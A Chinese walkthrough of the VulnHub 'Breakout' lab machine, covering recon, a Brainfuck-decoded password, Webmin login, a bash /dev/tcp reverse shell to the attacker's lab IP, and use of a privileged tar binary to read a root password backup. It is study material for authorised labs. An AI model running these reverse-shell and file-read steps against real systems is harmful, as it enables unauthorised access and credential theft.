当前位置: 首页 > article >正文

vulhub系列-76-02-Breakout(超详细)

免责声明本文记录的是 02-Breakout 渗透测试靶机 的解题过程所有操作均在 本地授权环境 中进行。内容仅供 网络安全学习与防护研究 使用请勿用于任何非法用途。读者应遵守《网络安全法》及相关法律法规自觉维护网络空间安全。环境 https://download.vulnhub.com/empire/02-Breakout.zip一、信息收集1、探测目标IP地址arp-scan -l #探测当前网段的所有ip地址┌──(root㉿kali)-[~] └─# arp-scan -l #探测当前网段的所有ip地址 Interface: eth0, type: EN10MB, MAC: 00:0c:29:55:2f:ef, IPv4: 192.168.0.22 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.0.1 00:50:56:c0:00:08 VMware, Inc. 192.168.0.2 00:50:56:e8:e2:84 VMware, Inc. 192.168.0.28 00:0c:29:f5:33:66 VMware, Inc. 192.168.0.254 00:50:56:e3:aa:d9 VMware, Inc. ​ 5 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.959 seconds (130.68 hosts/sec). 4 respondednmap -sP 192.168.0.0/24┌──(root㉿kali)-[~] └─# nmap -sP 192.168.0.0/24 Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-24 07:24 -0400 Nmap scan report for 192.168.0.1 Host is up (0.00019s latency). MAC Address: 00:50:56:C0:00:08 (VMware) Nmap scan report for 192.168.0.2 Host is up (0.00011s latency). MAC Address: 00:50:56:E8:E2:84 (VMware) Nmap scan report for 192.168.0.28 Host is up (0.00013s latency). MAC Address: 00:0C:29:F5:33:66 (VMware) Nmap scan report for 192.168.0.254 Host is up (0.00010s latency). MAC Address: 00:50:56:E3:AA:D9 (VMware) Nmap scan report for 192.168.0.22 Host is up. Nmap done: 256 IP addresses (5 hosts up) scanned in 4.52 seconds目标IP192.168.0.282、探测目标IP开放端口nmap -A -T4 -p 1-65535 192.168.0.28┌──(root㉿kali)-[~] └─# nmap -A -T4 -p 1-65535 192.168.0.28 Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-24 07:24 -0400 Nmap scan report for 192.168.0.28 Host is up (0.00028s latency). Not shown: 65530 closed tcp ports (reset) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.51 ((Debian)) |_http-title: Apache2 Debian Default Page: It works |_http-server-header: Apache/2.4.51 (Debian) 139/tcp open netbios-ssn Samba smbd 4 445/tcp open netbios-ssn Samba smbd 4 10000/tcp open http MiniServ 1.981 (Webmin httpd) |_http-server-header: MiniServ/1.981 |_http-title: 200 mdash; Document follows 20000/tcp open http MiniServ 1.830 (Webmin httpd) |_http-title: 200 mdash; Document follows |_http-server-header: MiniServ/1.830 MAC Address: 00:0C:29:F5:33:66 (VMware) Device type: general purpose|router Running: Linux 4.X|5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 1 hop ​ Host script results: | smb2-time: | date: 2026-03-24T11:24:54 |_ start_date: N/A | smb2-security-mode: | 3.1.1: |_ Message signing enabled but not required |_nbstat: NetBIOS name: BREAKOUT, NetBIOS user: unknown, NetBIOS MAC: unknown (unknown) ​ TRACEROUTE HOP RTT ADDRESS 1 0.28 ms 192.168.0.28 ​ OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 44.69 seconds ​端口80、139、445、10000、200003、目录探测dirsearch -u http://192.168.0.28┌──(root㉿kali)-[~] └─# dirsearch -u http://192.168.0.28 /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460 Output File: /root/reports/http_192.168.0.28/_26-03-24_07-25-00.txt Target: http://192.168.0.28/ [07:25:00] Starting: [07:25:01] 403 - 277B - /.ht_wsr.txt [07:25:01] 403 - 277B - /.htaccess.bak1 [07:25:01] 403 - 277B - /.htaccess.sample [07:25:01] 403 - 277B - /.htaccess.save [07:25:01] 403 - 277B - /.htaccess_extra [07:25:01] 403 - 277B - /.htaccess.orig [07:25:01] 403 - 277B - /.htaccess_sc [07:25:01] 403 - 277B - /.htaccess_orig [07:25:01] 403 - 277B - /.htaccessOLD2 [07:25:01] 403 - 277B - /.htaccessOLD [07:25:01] 403 - 277B - /.htaccessBAK [07:25:01] 403 - 277B - /.html [07:25:01] 403 - 277B - /.htm [07:25:01] 403 - 277B - /.htpasswd_test [07:25:01] 403 - 277B - /.htpasswds [07:25:01] 403 - 277B - /.httr-oauth [07:25:16] 301 - 313B - /manual - http://192.168.0.28/manual/ [07:25:16] 200 - 208B - /manual/index.html [07:25:21] 403 - 277B - /server-status [07:25:21] 403 - 277B - /server-status/ Task Completed二、漏洞利用1、信息搜集http://192.168.0.28/manual/en/index.htmlhttp://192.168.0.28:20000https://192.168.0.28:20000/查看源码可以发现最下面有一串不知道是什么东西查了一下这是一个Brainfuck编码。[-]...----..-----------.-----------...-.--------..------------.---------...解码后.2uqPEfj3DPa-3这应该是一个密码暂且当密码吧毕竟账号也没有这么奇怪的在nmap扫描端口的时候我们知道了139、445在 samba软件上。使用下列命令扫一下相关信息。enum4linux -a 192.168.0.28 密码.2uqPEfj3DPa-3┌──(root㉿kali)-[~] └─# enum4linux -a 192.168.0.28 Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Mar 24 07:31:29 2026 ( Target Information ) Target ........... 192.168.0.28 RID Range ........ 500-550,1000-1050 Username ......... Password ......... Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ( Enumerating Workgroup/Domain on 192.168.0.28 ) [] Got domain/workgroup name: WORKGROUP ( Nbtstat Information for 192.168.0.28 ) Looking up status of 192.168.0.28 BREAKOUT 00 - B ACTIVE Workstation Service BREAKOUT 03 - B ACTIVE Messenger Service BREAKOUT 20 - B ACTIVE File Server Service ..__MSBROWSE__. 01 - GROUP B ACTIVE Master Browser WORKGROUP 00 - GROUP B ACTIVE Domain/Workgroup Name WORKGROUP 1d - B ACTIVE Master Browser WORKGROUP 1e - GROUP B ACTIVE Browser Service Elections MAC Address 00-00-00-00-00-00 ( Session Check on 192.168.0.28 ) [] Server 192.168.0.28 allows sessions using username , password ( Getting domain SID for 192.168.0.28 ) Domain Name: WORKGROUP Domain Sid: (NULL SID) [] Cant determine if host is part of domain or part of a workgroup ( OS information on 192.168.0.28 ) [E] Cant get OS info with smbclient [] Got OS info for 192.168.0.28 from srvinfo: BREAKOUT Wk Sv PrQ Unx NT SNT Samba 4.13.5-Debian platform_id : 500 os version : 6.1 server type : 0x809a03 ( Users on 192.168.0.28 ) Use of uninitialized value $users in print at ./enum4linux.pl line 972. Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975. Use of uninitialized value $users in print at ./enum4linux.pl line 986. Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988. ( Share Enumeration on 192.168.0.28 ) smbXcli_negprot_smb1_done: No compatible protocol selected by server. Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers IPC$ IPC IPC Service (Samba 4.13.5-Debian) Reconnecting with SMB1 for workgroup listing. Protocol negotiation to server 192.168.0.28 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE Unable to connect with SMB1 -- no workgroup available [] Attempting to map shares on 192.168.0.28 //192.168.0.28/print$ Mapping: DENIED Listing: N/A Writing: N/A [E] Cant understand response: NT_STATUS_OBJECT_NAME_NOT_FOUND listing \* //192.168.0.28/IPC$ Mapping: N/A Listing: N/A Writing: N/A ( Password Policy Information for 192.168.0.28 ) Password: [] Attaching to 192.168.0.28 using a NULL share [] Trying protocol 139/SMB... [] Found domain(s): [] BREAKOUT [] Builtin [] Password Info for Domain: BREAKOUT [] Minimum password length: 5 [] Password history length: None [] Maximum password age: 136 years 37 days 6 hours 21 minutes [] Password Complexity Flags: 000000 [] Domain Refuse Password Change: 0 [] Domain Password Store Cleartext: 0 [] Domain Password Lockout Admins: 0 [] Domain Password No Clear Change: 0 [] Domain Password No Anon Change: 0 [] Domain Password Complex: 0 [] Minimum password age: None [] Reset Account Lockout Counter: 30 minutes [] Locked Account Duration: 30 minutes [] Account Lockout Threshold: None [] Forced Log off Time: 136 years 37 days 6 hours 21 minutes [] Retieved partial password policy with rpcclient: Password Complexity: Disabled Minimum Password Length: 5 ( Groups on 192.168.0.28 ) [] Getting builtin groups: [] Getting builtin group memberships: [] Getting local groups: [] Getting local group memberships: [] Getting domain groups: [] Getting domain group memberships: ( Users on 192.168.0.28 via RID cycling (RIDS: 500-550,1000-1050) ) [I] Found new SID: S-1-22-1 [I] Found new SID: S-1-5-32 [I] Found new SID: S-1-5-32 [I] Found new SID: S-1-5-32 [I] Found new SID: S-1-5-32 [] Enumerating users using SID S-1-5-21-1683874020-4104641535-3793993001 and logon username , password S-1-5-21-1683874020-4104641535-3793993001-501 BREAKOUT\nobody (Local User) S-1-5-21-1683874020-4104641535-3793993001-513 BREAKOUT\None (Domain Group) [] Enumerating users using SID S-1-5-32 and logon username , password S-1-5-32-544 BUILTIN\Administrators (Local Group) S-1-5-32-545 BUILTIN\Users (Local Group) S-1-5-32-546 BUILTIN\Guests (Local Group) S-1-5-32-547 BUILTIN\Power Users (Local Group) S-1-5-32-548 BUILTIN\Account Operators (Local Group) S-1-5-32-549 BUILTIN\Server Operators (Local Group) S-1-5-32-550 BUILTIN\Print Operators (Local Group) [] Enumerating users using SID S-1-22-1 and logon username , password S-1-22-1-1000 Unix User\cyber (Local User) ( Getting printer info for 192.168.0.28 ) No printers returned. enum4linux complete on Tue Mar 24 07:32:09 2026等到一个用户cyber扫到了一个cyber的账户在两个界面尝试20000端口可以登录成功。可以看到一个终端界面进去看看有没有什么命令可以执行cyber/.2uqPEfj3DPa-3登录成功2、反弹shell浏览器终端bash -i /dev/tcp/192.168.0.22/8888 01kalinc -lvnp 8888反弹成功┌──(root?kali)-[~] └─# nc -lvnp 8888 listening on [any] 8888 ... connect to [192.168.0.22] from (UNKNOWN) [192.168.0.28] 36682 bash: cannot set terminal process group (1636): Inappropriate ioctl for device bash: no job control in this shell cyberbreakout:~$三、权限提升1、信息搜集我们去它的备份文件里找找有没有另一个网站的密码。cd /var/backups ls -alcyberbreakout:~$ cd /var/backups cd /var/backups cyberbreakout:/var/backups$ cyberbreakout:/var/backups$ ls -al ls -al total 28 drwxr-xr-x 2 root root 4096 Mar 24 07:29 . drwxr-xr-x 14 root root 4096 Oct 19 2021 .. -rw-r--r-- 1 root root 12732 Oct 19 2021 apt.extended_states.0 -rw------- 1 root root 17 Oct 20 2021 .old_pass.bak cyberbreakout:/var/backups$将备份文件压缩再解压缩后再访问就可以得到密码。cd ~ tar -cf bak.tar /var/backups/.old_pass.bak tar -xf bak.tar cat var/backups/.old_pass.bakcyberbreakout:/var/backups$ cd ~ cd ~ cyberbreakout:~$ ls ls bak.tar tar user.txt cyberbreakout:~$ cyberbreakout:~$ cyberbreakout:~$ ./tar -cf bak.tar /var/backups/.old_pass.bak ./tar -cf bak.tar /var/backups/.old_pass.bak ./tar: Removing leading / from member names cyberbreakout:~$ cyberbreakout:~$ chmod x tar chmod x tar chmod: changing permissions of tar: Operation not permitted cyberbreakout:~$ cyberbreakout:~$ ls -la ls -la total 580 drwxr-xr-x 8 cyber cyber 4096 Mar 24 07:36 . drwxr-xr-x 3 root root 4096 Oct 19 2021 .. -rw-r--r-- 1 cyber cyber 10240 Mar 24 07:39 bak.tar -rw------- 1 cyber cyber 0 Oct 20 2021 .bash_history -rw-r--r-- 1 cyber cyber 220 Oct 19 2021 .bash_logout -rw-r--r-- 1 cyber cyber 3526 Oct 19 2021 .bashrc drwxr-xr-x 2 cyber cyber 4096 Oct 19 2021 .filemin drwx------ 2 cyber cyber 4096 Oct 19 2021 .gnupg drwxr-xr-x 3 cyber cyber 4096 Oct 19 2021 .local -rw-r--r-- 1 cyber cyber 807 Oct 19 2021 .profile drwx------ 2 cyber cyber 4096 Oct 19 2021 .spamassassin -rwxr-xr-x 1 root root 531928 Oct 19 2021 tar drwxr-xr-x 2 cyber cyber 4096 Oct 20 2021 .tmp drwx------ 16 cyber cyber 4096 Oct 19 2021 .usermin -rw-r--r-- 1 cyber cyber 48 Oct 19 2021 user.txt cyberbreakout:~$ cyberbreakout:~$ tar -xf bak.tar tar -xf bak.tar cyberbreakout:~$ cyberbreakout:~$ cat var/backups/.old_pass.bak cat var/backups/.old_pass.bak Ts4YurgtRX(~h cyberbreakout:~$ cyberbreakout:~$得到密码之后在20000端口重新登录root账号即可有root权限的终端root/Ts4YurgtRX(~h[rootbreakout ~]$ ls rOOt.txt [rootbreakout ~]$ cat rOOt.txt 3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation} ​ Author: Icex64 Empire Cybersecurity ​ [rootbreakout ~]$本文涉及的技术方法仅适用于 授权测试环境 或 合法 CTF 赛事。请勿在未授权的情况下对任何系统进行测试。安全之路始于合规终于责任。

相关文章:

vulhub系列-76-02-Breakout(超详细)

免责声明:本文记录的是 02-Breakout 渗透测试靶机 的解题过程,所有操作均在 本地授权环境 中进行。内容仅供 网络安全学习与防护研究 使用,请勿用于任何非法用途。读者应遵守《网络安全法》及相关法律法规,自觉维护网络空间安全。…...

vulhub系列-74-Hackable III(超详细)

免责声明:本文记录的是 Hackable III 渗透测试靶机 的解题过程,所有操作均在 本地授权环境 中进行。内容仅供 网络安全学习与防护研究 使用,请勿用于任何非法用途。读者应遵守《网络安全法》及相关法律法规,自觉维护网络空间安全。…...

vulhub系列-73-RA1NXing Bots(超详细)

免责声明:本文记录的是 RA1NXing Bots 渗透测试靶机 的解题过程,所有操作均在 本地授权环境 中进行。内容仅供 网络安全学习与防护研究 使用,请勿用于任何非法用途。读者应遵守《网络安全法》及相关法律法规,自觉维护网络空间安全…...

知识图谱(BILSTM+CRF项目完整实现)【第六章】

一、代码架构图在data_origin中有两种类型的数据:分别是一般项目和一般项目txtoriginal一般项目中放的是部位、症状、索引;列之间用制表符隔开一般项目txtoriginal放的是原始数据;二、构建序列标注数据要把原始数据转换为目标数据:常用的方式…...

LLM应用缓存设计范式重构,Dify 2026新增Context-Aware TTL引擎与动态驱逐策略

第一章:Dify 2026缓存机制演进与核心设计哲学Dify 2026 的缓存体系并非简单沿袭传统 LRU 或 TTL 模式,而是以“语义感知”与“推理链可追溯”为双支柱重构底层数据生命周期管理。其核心设计哲学强调:缓存不是性能的临时补丁,而是推…...

NativeScript APP 开发备忘

devtools 调试断开 命令ns debug android可以开启浏览器的调试页面,非常方便。一开始使用功能非常完整,包括元素、日志、代码和网络,后来用着用着,发现元素和网络没了,剩下日志和代码可用,再后来用着用着&…...

unity mcp接入 实现一句话生成游戏!

文章目录前言一、MCP 核心包接入 Unity 编辑器1、使用Git URL 安装(可选,最新)2、Unity Asset Store 安装(可选,稳定)2、OpenUPM(可选)二、Python 3.10 与 uv 环境搭建1、安装 Pyth…...

担心2026年数字人直播系统投入过高?五款主流平台落地方案对比评测

一、引文/摘要:投入焦虑下,如何选对数字人直播系统2026年数字人直播持续升温,越来越多商家想借助数字人直播系统降本增效,但“投入高、落地难、性价比低”成为首要顾虑。不少用户困惑,如何在控制成本的同时&#xff0c…...

多态章-虚函数-重写-协变-override/final-重写覆盖隐藏的对比-纯虚函数与抽象类-多态的底层-虚函数表-动态绑定-静态绑定

使用的父类子类 基于继承下的虚函数 调用 ——代码复用。形成条件:1.必须是基类的指针或引用调用虚函数。 2.调用子类中拥有父类的虚函数的重写/覆盖。虚函数:类成员函数前加以virtual就成为了虚函数 注意:非成员函数无法加virtual修饰。cl…...

Phi-3-mini-4k-instruct-gguf多场景应用:写邮件/解题/写SQL/生成测试用例实战演示

Phi-3-mini-4k-instruct-gguf多场景应用:写邮件/解题/写SQL/生成测试用例实战演示 1. 模型简介 Phi-3-Mini-4K-Instruct是一个38亿参数的轻量级开源模型,采用GGUF格式提供。这个模型在Phi-3数据集上训练,该数据集包含合成数据和经过筛选的公…...

Java八股文实战:从原理到代码,解析Pixel Couplet Gen的Java客户端设计

Java八股文实战:从原理到代码,解析Pixel Couplet Gen的Java客户端设计 1. 为什么需要关注Java客户端设计 在分布式系统开发中,客户端设计往往是被忽视的一环。很多开发者更关注服务端实现,却忽略了客户端的健壮性和可维护性。但…...

金融评分卡‌是一种将用户信用风险量化为分数的模型工具,广泛应用于贷款审批、额度定价和风险预警等环节,分数越高代表风险越低

‌金融评分卡‌是一种将用户信用风险量化为分数的模型工具,广泛应用于贷款审批、额度定价和风险预警等环节,分数越高代表风险越低。一、评分卡的核心作用金融机构通过评分卡快速判断:是否授信(如信用卡申请)授信额度与…...

0421晨间日记

- 关键词 - 上午- 吃饭- 从五台山到大同 - 下午- 云冈石窟- 石头要好雕刻,就意味着容易损毁- 国家要统治- 人生来就是苦的,让你接受是苦的- 地主因为信佛,得到了好处的,愿意捐钱修建- 大同古城墙- 这个建立起来确实很壮观- 但是高…...

数据预处理和超范围值处理步骤 18

1 .数据预处理实验(1)导入数据操作步骤:① 从“源”面板拖入“Excel”节点。② 双击节点,选择待处理的数据文件。③ 从“输出”面板拖入“表格”节点,连接至“Excel”节点,右键运行,查看原始数据…...

辅助医生能力成长与患者个体化治疗方案生成系统(上)

摘要 本文档详细阐述了一套面向基层医疗机构的辅助医生能力成长与患者个体化治疗方案生成系统的设计与实现。系统以“规则驱动为基、数据驱动为翼”为核心思想,通过症状-疾病映射、指南依据匹配、用药禁忌筛查、个体化调整与风险预警等模块,为临床医生提供实时、可解释的决策…...

【2026最新】JDK 下载安装与环境配置全教程(Windows/Mac/Linux 三平台,零基础友好)

Java 开发的第一步,就是把 JDK 环境搭好。这一步看着简单,但不少新手会在环境变量配置上踩坑——JAVA_HOME 没设对、javac 报“不是内部或外部命令”、改完变量终端里还是不生效……这些坑我都替你踩过一遍了。 这篇文章就用最直白的方式,手…...

在 Word 中,一个公式就能看出你会不会高效排版

在 Word 中,一个公式就能看出你会不会高效排版 很多人写论文、实验报告或者技术文档时,一碰到公式就习惯打开 MathType,点来点去插入分式、求和、下标,操作不算难,但确实有点慢。 其实,对于很多常见公式&am…...

从零开始:Spring Boot + MyBatis 搭建后端接口完整教程

前言:你是否刚接触 Spring Boot,面对一堆配置不知从何下手?是否看了很多教程,却还是搞不清 Controller、Service、Mapper 到底谁先谁后?本文带你从零开始,手把手搭建一个完整的 Spring Boot MyBatis 项目。…...

当智能眼镜遇上了AI——使用灵珠搭建【镜中食谱】智能体

今天带大家沉浸式体验 Rokid 自研的 AI 开发平台——【灵珠平台】! 🌟 零代码、零门槛,手把手教你搭建一个专属的【镜中食谱】智能体,让 Rokid Glasses 解决你的吃饭难题! 本文智能体基于Rokid AI Glasses和灵珠AI平…...

Pi0视觉-语言-动作流模型科研应用:人类意图识别与机器人行为对齐研究

Pi0视觉-语言-动作流模型科研应用:人类意图识别与机器人行为对齐研究 1. 项目概述与科研价值 Pi0是一个突破性的视觉-语言-动作流模型,专门为通用机器人控制而设计。这个模型的核心价值在于它能够将人类的自然语言指令、视觉感知和机器人动作生成无缝连…...

robot_localization实现imu和odom融合

记录使用robot_localization进行融合下载地址:git clone https://gitee.com/bingshuibuliang/robot_localization.git注意:/odometry/filtered是这个节点发送的融合位姿,修改的话需要在ekf_nodelet_template.launch里,在使用robot…...

从扩频时钟到弹性缓存:一张图看懂PCIe是如何‘容忍’时钟偏差,保证数据不丢的

从水流模型到数据同步:图解PCIe时钟偏差补偿机制 想象一下城市供水系统中两个不同步的水泵——一个抽水快,一个抽水慢。如果没有调节装置,要么水管爆裂,要么用户断水。PCIe总线面临的时钟同步挑战与此惊人相似。本文将用生活化的水…...

《Spring Boot 第一个 REST API 教程》

前置知识:Java 基础、Maven 基础 最终效果:启动一个 Spring Boot 应用,通过浏览器访问 http://localhost:8080/hello 得到 {"msg":"Hello World"} 步骤 1:创建项目 推荐使用 Spring Initializr:…...

ROS2笔记2:使用Topic自定义Messages实现nodes之间通讯

1. Package规划 1.1 自定义消息接口my_interface_pkg DirCommandRequest.msg请求Topic消息 由发起node发起的Topic消息builtin_interfaces/Time stamp # 记录时间戳 string directory # 操作的目录 int8 command # 操作指令. 0:list, 1:re…...

如何3分钟解决百度网盘提取码难题:baidupankey完全指南

如何3分钟解决百度网盘提取码难题:baidupankey完全指南 【免费下载链接】baidupankey 项目地址: https://gitcode.com/gh_mirrors/ba/baidupankey 你是否曾因找不到百度网盘提取码而错过重要资源?当朋友分享学习资料、同事发送工作文件&#xff…...

2026年最新好用的WMS仓库管理系统盘点!10款国内外热门WMS系统推荐

面对仓储管理的挑战,越来越多的企业开始关注WMS系统。但在选型时,很多企业面临同样的困惑:市场上WMS系统那么多,到底哪款适合自己?本文盘点2026年国内外10款热门WMS系统,从功能特点、适用场景、性价比等维度…...

3分钟搞定百度网盘提取码:baidupankey智能工具终极指南

3分钟搞定百度网盘提取码:baidupankey智能工具终极指南 【免费下载链接】baidupankey 项目地址: https://gitcode.com/gh_mirrors/ba/baidupankey 你是否曾经遇到过这样的情况:好不容易找到了需要的资源,却被百度网盘提取码挡在门外&…...

打卡信奥刷题(3138)用C++实现信奥题 P7617 [COCI 2011/2012 #2] KOMPIĆI

P7617 [COCI 2011/2012 #2] KOMPIĆI 题目描述 给定 NNN 个正整数 A1,A2,...,ANA_1,A_2,...,A_NA1​,A2​,...,AN​&#xff0c;求有多少整数对 (i,j)(i,j)(i,j)&#xff0c;满足以下条件&#xff1a; 1≤i<j≤N1 \le i < j \le N1≤i<j≤NAiA_iAi​ 和 AjA_jAj​ 至…...

如何让全面战争MOD开发从繁琐变得优雅:RPFM的现代化解决方案

如何让全面战争MOD开发从繁琐变得优雅&#xff1a;RPFM的现代化解决方案 【免费下载链接】rpfm Rusted PackFile Manager (RPFM) is a... reimplementation in Rust and Qt5 of PackFile Manager (PFM), one of the best modding tools for Total War Games. 项目地址: https…...

我第一次做 OData 后端服务时,真正绊住我的,不是代码,而是 Cloud Foundry 里的这些基础坑

最近我给自己加了一条训练线,除了平时在社区里吸收知识、输出知识,我还逼着自己每周完成一个带明确目标的小任务。第二个任务,我挑了一个很适合拿来练基本功的方向,亲手做一个基于 OData 的后端服务。 原本我以为,真正费劲的部分会落在 OData 协议本身,像 entity、servi…...